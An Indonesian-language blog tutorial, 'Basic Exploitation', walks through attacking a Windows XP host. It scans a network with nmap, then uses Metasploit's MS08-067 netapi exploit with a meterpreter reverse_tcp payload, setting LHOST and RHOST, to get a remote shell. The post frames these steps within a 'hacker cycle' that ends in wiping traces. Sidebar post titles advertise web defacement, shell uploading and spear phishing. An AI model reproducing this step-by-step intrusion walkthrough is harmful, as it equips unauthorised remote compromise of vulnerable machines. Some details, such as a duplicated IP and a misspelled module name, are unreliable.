Basic Exploitation
Basic Exploitation
Exploitasi adalah sebuah pemanfaatan vulnerable system yang memungkinkan terjadinya remote system olehuser yang tidak terautentikasi. Dalam dunia exploitasi, software yang terkenal untuk exploitasi adalahmetasploit.
Exploitasi memang terdengar sulit, namun pengaplikasiannya sangat mudah. Kita cukup mengenal siklus hackerbekerja, yaitu:
- Information Gathering
- Vulnerability Assessment
- Gaining Access
- Maintaining Access
- Wiping Trace
Code:
root@blusp10it:~# nmap 172.16.128.1/24Command ini berfungsi untuk melakukan scanning pada network dengan kisaran IP => 172.16.128.1sampai 172.16.128.255.
Terlihat pada hasil scan nmap, ada dua host yang up yaitu:
- 172.16.128.1 [ip saya]
- 172.16.128.1 [ip target]
Kemudian langkah selanjutnya adalah melakukan scanning pada host yang up dengan nmap. Command dasarnya adalah:
Code:
root@blusp10it:~# nmap [ip-host]Jika target host kamu adalah 172.16.129.128, maka gunakan:
Code:
root@blusp10it:~# nmap 172.16.129.128Terlihat bahwa host 172.16.129.128 memiliki tiga port yang terbuka yaitu:
- 135
- 139
- 445
Code:
root@blusp10it:~# msfconsoleCode:
msf > show exploits Untuk sistem operasi Windows XP dengan port 445 yang terbuka, kita bisa menggunakan modul exploit ms08_06_netapi
Gunakan perintah:
Code:
msf > use exploit/windows/smb/ms08_067_netapiSetelah itu gunakan payload, sebagai penghubung exploit dengan remote system. Untuk melihat payload yang bisa digunakan, gunakan perintah:
Code:
msf exploit(ms08_067_netapi) > show payloadsCode:
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcpPerintah ini akan membuat exploit berinteraksi dengan meterpreter melalui TCP. Setelah itu, set local remote yang akan dijadikan base exploit. Gunakan commmand:
Code:
msf exploit(ms08_067_netapi) > set LHOST 172.16.129.1Perlu diperhatikan, untuk local remote, gunakan IP kita sendiri.
Kemudian, tentukan remote host atau IP target exploitasi. Gunakan perintah:
Code:
msf exploit(ms08_067_netapi) > set RHOST 172.16.129.128Setelah itu, cek kembali dependency modul yang akan diekseskusi dengan menggunakan perintah:
Code:
msf exploit(ms08_067_netapi) > show optionsSetelah semua options terisi dengan benar, lakukan eksekusi eksploitasi dengan perintah:
Code:
msf exploit(ms08_067_netapi) > exploitTerlihat bahwa metasploit langsung berinteraksi dengan modul payload meterpreter.
Dengan peyload meterpreter yang telah aktif, berarti kita telah berhasil melakukan eksploitasi. Cukup kali ini basic exploitation yang saya sampaikan. Berikutnya akan ada basic meterpreter untuk memahami basic command meterpreter.
About: jefri
You may also like...
Langganan:
Posting Komentar (Atom)
Recent Posts
Popular Posts
-
1.LOAD_FILE Load file adalah query SQL untuk meng-load suatu file scara remote..kurang lebihnya seperti itu ..
-
siap meluncur di tunggu dari kawan kawan untuk sharing bugs and scaning pake bot
-
Oke, untuk yang belum tau aja yhaa... ^^ Utk pengguna windoss, install dlu interpreter python, coz bhs ini ga default ada… (ckckck...
-
Ciuman adalah bahasa tubuh yang populer untuk mengungkapkan rasa sayang kepada pasangan, teman maupun keluarga. Tapi ada beberapa tipe...
-
Assalamu alaikum Sudah lama tidak posting blog nih disini saya akan membahas cara membuat program transaksi penjualan dengan Fox pro ...
-
Gambaran Web Attack : Scan => XPL/SQLi => Upload Shell => Deface/Jumping => Rooting 1. Scan Cari tau dimana letak kel...
-
Membuat payload dan mengirimnya kepada target dengan metode spear pishing attack adalah cara termudah dalam melakukan exploitasi. Nam...
-
assalamualaikummm permisi bang ane cuma mau share,.... gimana cara atau trik membuat Flashing screen ( atau layar menjadi kelap kelip,....)
-
Pada hari ini saya akan posting alur web attack buat yang mau blajar silahkan 1. Scan Cari tau dimana letak kelemahaan web target. bi...
-
jika kamu adalah seorang admin,webmaster di suatu website . . . pasti kamu ingin menangkalserangan ini...ane akan beri sedikit ...
Recent Comments
Labels
Labels
Find us on Facebook
Labels
- backtrack (47)
- berita (12)
- blogseo (6)
- education (1)
- foxpro (2)
- hacking (78)
- Ilmu Komputer (131)
- info unik (32)
- intim (12)
- kesehatan (23)
- lounge (4)
- love (11)
- network (1)
- Network-Linux (1)
- network-windows (1)
- olahraga (5)
- pascal (2)
- php (1)
- programer (29)
- relationship (23)
- sqljavascriptdll (7)
- Virus (1)
- webhacking (9)
- wifihack (8)











Tidak ada komentar:
Posting Komentar